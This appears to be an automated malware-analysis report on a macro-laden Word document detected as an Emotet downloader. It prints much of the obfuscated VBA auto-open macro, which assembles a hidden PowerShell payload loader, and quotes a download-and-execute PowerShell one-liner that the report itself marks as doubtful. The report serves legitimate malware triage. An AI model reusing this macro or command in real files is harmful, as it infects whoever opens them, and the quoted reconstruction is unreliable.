Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
- T1566.001 Phishing: Spearphishing Attachment
The file contains VBA macros, specifically a Document_Open macro that calls the Shell() function. The macro is built to run a PowerShell command which is obfuscated but, according to the analyzer, reconstructs to 'powershell -nop -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://schemas.openxmlformats.org/drawingml/2006/main')"', i.e. a command that downloads and executes a second-stage payload from that URL. Two details elsewhere in this report should be weighed against that reconstruction: the only extracted URL is the standard OOXML DrawingML namespace URI and was found in the document body rather than in macro code (see EMBEDDED_URL below), and the previewed macro source assembles a command built around System.IO.Compression.DeflateStream over System.Convert::FromBase64String, i.e. an embedded compressed payload rather than a plain DownloadString. The ClamAV detection name 'Doc.Downloader.Emotet-6877455-0' strongly suggests the Emotet family.
Heuristics (6)

- ClamAV: Doc.Downloader.Emotet-6877455-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6877455-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (found in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19393 bytes |

SHA-256 of macros.bas: 277422a0b8e8d12ee201cf00b21d1a060871004271537dbe9feab39da3d2c928
Script preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "JVVdjZCANoknl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
kdBhcj = 12550 * zJhUfC / IXhkz - LLhBaB
iDJBY = 35954 * jCiBR / JkUaao - bLbrk
FBUIYfziYz ("" + zzAEcXv + IFEDDNMilo + SGRvO + srJFhZDMjz + QjtPp + prQQWtQtqD + bPTdEnJ)
jnPOW = 59256 * fTRwHu / ITXqzY - kkrIn
mwwNrw = 70180 * QXLtS / mmtcY - PUsHA
sHKAzi = 44505 * SQQLzr / OkvBt - dXXkkM
End Sub
Attribute VB_Name = "SEqMGjASAIoO"
Function SGRvO()
On Error Resume Next
mQkVw = 6213 * HETNTh - 23342 * WQwYa / ruwBkz / nAwuMw + 66315 / oKCffq * 39211 / EzCFlI / 731 - FSQuV / UMFFTD / TGldL
ttuzX = tCirB + Ahpufn * BqpZa + QNksQ * abtVLY * XKsSi + 26373 * oDpiM
lZLvm = "pow" + fQETUbGwJJRQb + MdVLQMJ + "ers" + MWhMYFfJ + vdQrErQOiIMz + "he" + wdAquZcWstHz + YDdIdpIcvlRUzz + "l" + zOuwPvEpO + YlXjGwWp + "l" + ETncUiOZaZi + vtDwddwouQi + " " + XCLVdIvktuHUv + PnojcIcqDBtMj + " ( " + DIrcKMOF + BsBwvciQIY + "NEW" + wIjvLHTkvOu + zcTCdBisKbPar + "-Ob" + KwYRDaJjtP + lLZmwSHw + "JeC" + NfWYkohTV + uZzqcfQ + "t" + anbvwjkoRHjKZ + sufqUCZuhGqm + " " + WnqGGoaDbbEDsC + pUdRzhzaUqAt + "s" + GtKruTsETHIoT + RJWjzRWJIzon + "YSt"
QojJnV = (21333 - BItrlB + JIOvo * jiMzX / (jCrFfc + 35000 - 5108 - bfjja + (46062 - OmFjU / (75809 + rasbik))))
KdcNDqlYP = "e" + PlbqKCOO + DiciLOfYParrOw + "M." + fmAkSJH + zzhzMYrNW + "iO" + OshNCLttU + inJWbNijub + "." + NPwaDCAds + lmFnhGPNzsbU + "C" + pzdipqpFaTwDk + TudSAYkVaBZiN + "omP" + muEmOFXzDV + LmpdVZWjzzB + "r" + FbDdQLczB + wzblwva + "E" + sYikXDF + bosLXIdUVmK + "ss" + KFmfXzkkBXEp + sSGMFlUZsKma + "iO"
KOjzvd = (32058 - ziidk + hVQnIV * BsIDll / (EbXnFh + 33706 - 40381 - GRqwzO + (98385 - BsBuB / (831 + iCsJWY))))
sfSYK = (81896 - CjMjJ + SWknt * CtjqDb / (EDpIwN + 21319 - 12949 - Sfpocd + (80872 - hSrQQ / (60739 + WdjtR))))
bZomi = (19014 - dwsfI + saQoW * bkBPZ / (jNkMb + 84843 - 94979 - cIbjSG + (25256 - PUOhw / (60225 + zbWQar))))
FQcjhQ = "N." + zalVMYNVw + DFzENYDPIl + "D" + oXhmViRppd + OqIdwUwsBvcCY + "E" + UNshdNGwzf + qjZiaoEqWQaSo + "FLA" + TtviNzIzbzwnf + KzKcFMbRBNUhzD + "TE" + soVnDCAYui + hiBZicGcILifrc + "st" + tQItoXDwJ + IwliXcdjXLuwX + "R" + RhGqvbIj + ZqJKaDPNlzf + "eAm" + LCOsVFwRlvc + rSZPAMGEzm + "([" + wIfklAfuDv + imijMovjEELw + "SYs" + zSQZNQuTYw + zuwLSwishNi + "Te" + IrnVswiwPDNii + mPNiNjoAjt + "M." + SvojkqhEZ + jAkjkrjjnOGGSA + "IO." + LUqDbFjQ + TdozdzfQjhd + "M" + IANzBLp + kdWkiEWbTTjK + "e"
rqlHa = (TSjPP / COGiEL / 6578 / sKasQa + 89537 * OJNtk / 88668 * IQEOV * (SuHUA - HVoPX))
MmcdtMGkuv = "MoR" + jPsqAGODZ + zItzOzwhUa + "Y" + XQYmjZtpmv + tXOOPBOUFwDtO + "sTR" + PbZUmQwVabT + jMjBbFDqlhS + "E" + vOYNfYLz + NbtXzConv + "a" + osPBRJUjitGB + hwNvvTiBwV + "m]" + hGowuXwcGVJL + qPzTHZTCP + " [" + rADFmutbibO + wiFwOMnBhfcO + "S" + OAPfrjVDXsW + PkfncURVYUU + "yst" + RZKUaqk + aTvWMMvLMbu + "EM" + RBrzukJqju + RvsCSjiLkJMsF + ".c" + ZMHtsQt + cavAFouZ + "o" + uRCIuvLanIpz + jkdZAzXYnjar + "NvE" + GvOmoXNnWENw + FATdhJUULVYDK + "Rt]" + SiCKdTstCKW + NZLCTjSnQzKaO + ":" + tOkMrIDVKnDX + RSKkaGlJ + ":"
DGtua = (JQwZa / SISjLa / 39561 / ZWmzm + 94609 * QbkjOr / 12846 * iYJOlv * (jSbLYo - Ywtzz))
dDrCls = (OiHzoZ / jkJDB / 28413 / JFjzi + 98770 * niwjsA / 67193 * RBkRDp * (FGcsBD - ziIHUU))
TvHdVt = (LtLBLK / KBLiEi / 79912 / WaZtA + 6403 * mPtVQL / 56861 * lPCCV * (PKMdb - uiQsC))
uJJsOQjXz = "fr" + hDcslWGwHq + hAZTCjUuHQN + "Om" + puEwBSZMEU + JRwSTDVkwjtIz + "b" + XFRRqNTvcC + YUQcjrj + "Ase" + VboMrfaJA + KvCHnCr + "6" + VVQVzwQiENQRw + ddEwism + "4" + wvcRJpd + CtAKSPv + "s" + FmfjMoBdJwsrz + KYBUwYPjPLvNA + "TR" + oDTzhpaN + QfffIOEKGAuOb + "iN" + pDPYQbAKzJ + zCEjKSjhsj + "G(" + wqDtSQac + rmKpTMQVjVT + "'" + HCRjvuib + IcZYGsjjMVRLRY + "VZB" + URXDjnFjvrAjih + lnCNtoK + "N"
icUdWG = (FruLI / SonzdJ / 70480 / WXzLqG + 79816 * DULJM / 28125 * PPczk * (qNrsn - sDFim))
... (truncated)
```